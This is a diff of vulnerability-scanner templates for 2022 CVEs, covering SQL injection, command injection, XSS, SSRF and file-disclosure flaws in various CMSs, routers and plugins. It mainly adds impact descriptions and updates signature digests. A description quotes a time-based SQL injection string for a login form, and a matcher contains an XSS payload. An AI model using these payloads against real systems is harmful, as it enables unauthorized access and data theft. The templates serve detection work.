     Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "menu/html/edit.php")'
         condition: and
-# digest: 4a0a00473045022035b2589347f6c26673787acd847b29d3180c28bb2c5be017dcd46197ea545a020221008a8f3d7c5cea46d3b66bc093ab3cbfd6f3f5d181ef9aceec7410f1bb37ad3ae9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022038d3683d1e1ec0b43c064b75c03da7b4ad1d7b98974d30eac1549c828bdee2c20220776c9a5830025fc40e7cf5d4f954aaa5df3c772fefd414e1ccf945fb9cab9e9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml
index b97cb5f50f..380db2cfc9 100644
--- a/http/cves/2022/CVE-2022-24266.yaml
+++ b/http/cves/2022/CVE-2022-24266.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "list_admin_table")'
         condition: and
-# digest: 4a0a00473045022100c2c21eed67011bef98c2235a67fe853edfc45ef2ffb9978e1985a2db524af703022008a45465249968e29c2f3a3d53de156602a8e39277de6dbee8c0843b40f41706:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220271ee9637a46f92cfb7a302822d02e7f7d1c596ee58aba89a75da64fbca4f56f022100bb519144a72d2adb1168f584e8f1aa7ebebe286a000b6892fe0c40ddc2d43b32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml
index 1e3b76b8da..19c511eb66 100644
--- a/http/cves/2022/CVE-2022-24288.yaml
+++ b/http/cves/2022/CVE-2022-24288.yaml
@@ -5,6 +5,8 @@ info:
   author: xeldax
   severity: high
   description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Apache Airflow.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: word
         words:
           - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance
-# digest: 4a0a00473045022014842ef55613a08e855ece448c6be58bbbc935c133a193828e5868ece6bdef16022100ab54010cba62db2cf4e560ef069e36b5b5547a14206bfe514aeb10c8bedeccce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022046661002bc6674d56b4fd74628d069151f44d64024f20a180a717ec9fd249e4f022100d97833c4395dffbcbd42e6dda696644fb31ad4cb0b72efbeced2dfe73815c947:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml
index fd7f0baafe..ad1d606ec7 100644
--- a/http/cves/2022/CVE-2022-24384.yaml
+++ b/http/cves/2022/CVE-2022-24384.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
           - '"type":"error","text":"Unknown survey\"><img src=x onerror=alert(document.domain)>"'
           - 'smartertrack'
         condition: and
-# digest: 4a0a0047304502205589d664ad5bfabfb91edb14ab8b2f5290dc663c140c2cdcf9db29025c64b6dd022100844c8343ee5eb61fba48aa75d05d39d3b1fcde9bb4cd281e719b4c803e0bdb75:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203f7072e21c194d4b324bf096f5cbdbbd2f239e9df1038beeded3a1ade3fab74f022100bb548dcde8b46d63028716a4992661ccb8ba755798da521d7c53d70aa969f823:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml
index 8ae181a61b..34465788c2 100644
--- a/http/cves/2022/CVE-2022-2462.yaml
+++ b/http/cves/2022/CVE-2022-2462.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute.  If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
   remediation: |
     Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c2d9c624d4d4b7ba12730127db69806cd270448721972e9dceb09797ee5aa2a102200744e90482b07f15af4eb2274c6b484025c0fc57e8ef65e329d277a8e3186540:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008cb6b7f4487e12cb2b4bc1c2fdbc11a672257a852e36f217d757672503fd0969022100997c1e5936ee270653d950c7181b1aab9984dda8bc0e27f850ee38287893fcd8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml
index 69b46d8321..5e6307cd61 100644
--- a/http/cves/2022/CVE-2022-2467.yaml
+++ b/http/cves/2022/CVE-2022-2467.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008d5128849bba34950219f39ae76e013098b002e4c583369ef6f94e9715424e8b022062374c8f82f5694a8b1cf5082e375318dc798e89e23d1c620a8534c47ede8e28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022044c7881feebaf4f2c7161e70033fccee0d4f2462621488a580be527ad9f8d47402202832e8d1a23a5253bd3edce5f6023a0abc10a0f03c704cbed86213d828be1359:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml
index 45f8e2c6ee..1a5d651ba5 100644
--- a/http/cves/2022/CVE-2022-24681.yaml
+++ b/http/cves/2022/CVE-2022-24681.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information.
   remediation: |
     Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - '"BUILD_NUMBER":"([0-9]+)",'
         internal: true
         part: body
-# digest: 4b0a004830460221009ab257d22c90b78067bc1648000e389effa422dfbfe2fb526c1d134d1e48bfeb022100ec39937074f08330880e8a92b9644a21e8408da268cc1f5e71f0d83a391170e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220157d877be27f280b36b586c9470e1d38f2fe2b1756858a53e837662b8a5e3f0602204b7678b2f628b0cdb10f513241871bbb9f5ab764402b303fd64d5113091190cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml
index 1a8eda4fec..b9ff0488a2 100644
--- a/http/cves/2022/CVE-2022-24716.yaml
+++ b/http/cves/2022/CVE-2022-24716.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
+  impact: |
+    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data.
   remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
   reference:
     - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ea941407620c0d73c56ba5d889d0cf9e1ac258bc3fff67bd391adc128d9cfc35022100d2f5c335337e17069dcedfe99a3f785981928a3276aeaae17c01795b073f75b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e3e5ca5d8880ae4b9f2ee22e031be88a942843447d8837c47d5030ccd2ebe90502204824ecdd87f431e39981b332b9e60d1157daf6c3faf713140a52c687f6da729b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml
index 7f345ac301..4d16708893 100644
--- a/http/cves/2022/CVE-2022-24816.yaml
+++ b/http/cves/2022/CVE-2022-24816.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
   remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath.
   reference:
     - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
@@ -78,4 +80,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205e9636000761b66ced267c4a0211ff939d7e4cf4024b6d9e41fc880e53fdbb3802205b0a8542dc27ef98f92222ea06bf54bf05311c0e64243771acabbc13587d13c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009510566b8f27925c6145a1cfd7ad8c43dff28125f842d5c7da5f6013aabd28fb02210082a94d0ac4c6d7a664f163c5730d1fd7740ae099e1ddc7cf43e8818f6f73cbe5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml
index e77b34f695..c8568f3c72 100644
--- a/http/cves/2022/CVE-2022-24856.yaml
+++ b/http/cves/2022/CVE-2022-24856.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
+  impact: |
+    An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks.
   remediation: |
     The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
   reference:
@@ -37,4 +39,4 @@ http:
       - type: word
         words:
           - "Interactsh Server"
-# digest: 4a0a00473045022100b93e66c6a616e93767d58ac084e1ea6905ce274007db668d8dddcbb351ff36dd02206c2da6da852af7604e4f7e80f11b7297caed0eec34d218b176535271ff208a32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022071e0156eaeed85e576e8a8b42a89734c7057ec21e20101bba7ba8c4882ec384f022100e269073d66d3a2eda2e210eba157944c7a5fc7faf0f889a0b82f47362f98847d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml
index 5563fc1f86..019a58f516 100644
--- a/http/cves/2022/CVE-2022-2486.yaml
+++ b/http/cves/2022/CVE-2022-2486.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 490a0046304402204cea23b22543eee1809802c772e4d99df8f2279264f4abdbddfc6823247b9a3602205f8dd5f922b76a336d9f62cbd9aa1b480691e891d0d326cb53fb9340ed080fa0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a52d31d6fbe3d11f428139ef1205948fb5cd761ff49bd4f7e8ad50b99ec2e6fa02203221c2b301289919f84ad016be8593e10aa727f3ca116acde41614cf9037bbb5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml
index 13b8dadd52..de62825c0e 100644
--- a/http/cves/2022/CVE-2022-2487.yaml
+++ b/http/cves/2022/CVE-2022-2487.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e82ed02e3408f919385699f741551439781ae5d65ec51f05b26af275ce3965d1022100bb4ddf43e9851a21a4e06983e811fc2471aaff7eb49d75066d116d6742e029a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203027f005b13fb0f85b4d8404e417a6916d3c3cb6fab857f9faebb079b3c60904022100bb96048cc8541443d675fb2d2ec5b86f56d1b313b139a09f890f257dcfe9264e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml
index d3669c66ba..082fad3b3e 100644
--- a/http/cves/2022/CVE-2022-2488.yaml
+++ b/http/cves/2022/CVE-2022-2488.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 490a0046304402200a12046f4b6bc60c554ac836a1f83ce4f2d4e09621e6a31ae921b2b842b4c38102203987ea6b69a09023d59bc79c900f60cd12c294f945a22df5c3a521b0dfc2a0ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c85f04b1a27e16db0ab77fdfca9c867360fdc30047508489ca579579f9bf5efb02205107bc48f1a8fa7251f170dfbc27c104eea4968c8d63ea5914e48d9b91732372:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml
index 762d7a3439..ca22b65029 100644
--- a/http/cves/2022/CVE-2022-24899.yaml
+++ b/http/cves/2022/CVE-2022-24899.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Contao prior to 4.13.3 contains a cross-site scripting vulnerability.  It is possible to inject arbitrary JavaScript code into the canonical tag.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: As a workaround, users may disable canonical tags in the root page settings.
   reference:
     - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
@@ -46,4 +48,4 @@ http:
         part: header
         words:
           - text/html
-# digest: 4b0a0048304602210083d1597cebfed284c91c255cfad8773ffe3776efec72cd60e11d1d4ae20e7aa1022100906ccc6325b9c34e489f1ad0118c457de5a8417aa4c6e4ab4bed669787532aa9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204a88d345693b5b7ad9866966b5cbd62c2246b373d96260d387cd0f2aa24ed005022100e0303a2c58e6fbf6b8b4657330b0281b6c4ffd3e3a8e89ac0ad811f0ad325654:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml
index 7869cf7c82..e7d0fbe398 100644
--- a/http/cves/2022/CVE-2022-24900.yaml
+++ b/http/cves/2022/CVE-2022-24900.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206e03729b78e780b3bf769384010af6decc1c3f9065cdf02f00e96cc549441fe8022064658d42a87e279e0b629f39e47667babf1c27c7b2c2da6821557250fd0b1cde:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204bde26466643059dbf9eb83364020fe65671c1dbd4fe9ccd3eb5737c8459a5a502210099a551f41d4af0c16ccac03d4ce09a3ef3f2ee38bf3f776c30e292cd250aa4e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml
index 41a5760100..1613fc6c65 100644
--- a/http/cves/2022/CVE-2022-24990.yaml
+++ b/http/cves/2022/CVE-2022-24990.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information about the server, potentially leading to further attacks.
   remediation: |
     Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022026eea3b995a3fbc948861aedf7f61a79bf035b7183a24c693fcc4bcc00e708c102210094737e4c1280d63b40c0168fea1a8645e113ea7bd7eb0b7bba5409a67727681a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ef5cd04e5570ae8db5c999fcca8f309a7c7c61ea87340f8176da828a5015b26e022044a55e2357be17d7d7ee1aba59494198f127e41df160e4e4aa0ec0d7f2471aa3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml
index 16fb4ca7ce..8cfdee501a 100644
--- a/http/cves/2022/CVE-2022-25082.yaml
+++ b/http/cves/2022/CVE-2022-25082.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the command injection vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f4fecc452c3d9ef958d270ae59a2d57c88ba3438f339dedd2324b02fc87464ca022065397bf6311167052ae37af9ee09d179e95e00d3f2b16049a4ef09c9da31514b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bb173625c306d4040e371b5b1e53f00eb9294613bbb50bd5e6570a649e1cb92902204b0b241a59b0985eba24881110619150fc624a9c3d4a64257edfcde001d772dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml
index cc93103849..4233bbb41f 100644
--- a/http/cves/2022/CVE-2022-25125.yaml
+++ b/http/cves/2022/CVE-2022-25125.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4.
   reference:
@@ -50,4 +52,4 @@ http:
         part: header
         words:
           - "application/json"
-# digest: 4a0a0047304502202ffcb52cbda47c23c7e70620dc490dac1408608ab390305f346ab33c405a4272022100b9b38ba4de500261015318bbb59f391244f6bffc5fd5938695242056283c04f7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e5edeada8f5f9d9c5000a6a811d9fbc0dee5e4dd990db0b5316f9cc5367876c102210082cfa164350c0a2ba257cd1c4d6d6fb8794e87d6e65085996e074f93b2879df1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml
index 7512292749..d534e45df2 100644
--- a/http/cves/2022/CVE-2022-25216.yaml
+++ b/http/cves/2022/CVE-2022-25216.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.
+  impact: |
+    The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure.
   remediation: |
     Apply the latest patch or update from the vendor to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203c92bbcb399e93c55a3f07a5baef13c41123965ed46ed49a544c4619c2039bf5022072131ccf96ab860438663ea2ddec7f89d6c0f02b6d0d536ee752cd470c1a98ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f545c27f41b451e1ba96c94461c48283cd886015ec28f0d49628497d907fbb51022100c55c4db7d5e799a38a8cca8e72219bb3f117e3d298d6ac11823b9ac86c75cccd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml
index d3f0652417..d43fce3395 100644
--- a/http/cves/2022/CVE-2022-25323.yaml
+++ b/http/cves/2022/CVE-2022-25323.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 401
-# digest: 4a0a0047304502204907e47694062ecaa973e015b907c769833aece825334acc07ffa5c0e26b6ceb022100c2469ff1a0440af5a7625751aaf73d56a3906bcd5c4afcd89f250cd8700d00ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022022dd8f33ff1a93b55a44faef5f4615b0c00c6015079ebc203847d507d9b840850220314967d117c1fa1c7b92ba8050fcefb8b08fe19046bfc3000350137010e1dcf3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml
index 209641708b..6f25957027 100644
--- a/http/cves/2022/CVE-2022-25356.yaml
+++ b/http/cves/2022/CVE-2022-25356.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation.
   remediation: |
     Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c2983ac59ef55e16ce80ee2830fe05646cd7d9557e05464c05912076560fc30e022100863fd55a67293c6fd0ca035ad045eb5c2c56dd7091a463ff508d4535f124890c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220791e1461356eb21ffaa477cf886cfc381bfd50a26ea6cc0e6c7e382734db9243022100ac7015b81c77028cba6824de7c532e3e191507ae8aa1b0f88acf489a54e69a1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml
index 376731d363..cfed6a38a2 100644
--- a/http/cves/2022/CVE-2022-2544.yaml
+++ b/http/cves/2022/CVE-2022-2544.yaml
@@ -5,6 +5,8 @@ info:
   author: tess
   severity: high
   description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.
+  impact: |
+    An attacker can access sensitive files and potentially obtain sensitive information from the target system.
   remediation: |
     Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100abb7f4d17c59465b6fa7f13d02766881a8722c08c6f4d427ec4811955b6f4436022100a0054c67a9cffbdaf06a6c7c2a88f87715f28cfa562cc66c1e4b5eae20ddcd46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c5a1e472d4512c12b456615d231e2f7bd5395b8bcce8b566ecd76e15ef01d428022100caf623f9de06bcade168c81097dec986607d1b83a474344447bc5109f8859cba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml
index 204d7cd26d..5640b17e11 100644
--- a/http/cves/2022/CVE-2022-2546.yaml
+++ b/http/cves/2022/CVE-2022-2546.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
         regex:
           - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
         internal: true
-# digest: 490a0046304402200413328d96b0bfe894e685fbe6a9c1a24735166bf82c997a207f2dab74eaa05602202a418db4221c5c0373622f43a7fc739436b9464e9be03bc71db4f347f4a8c4d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
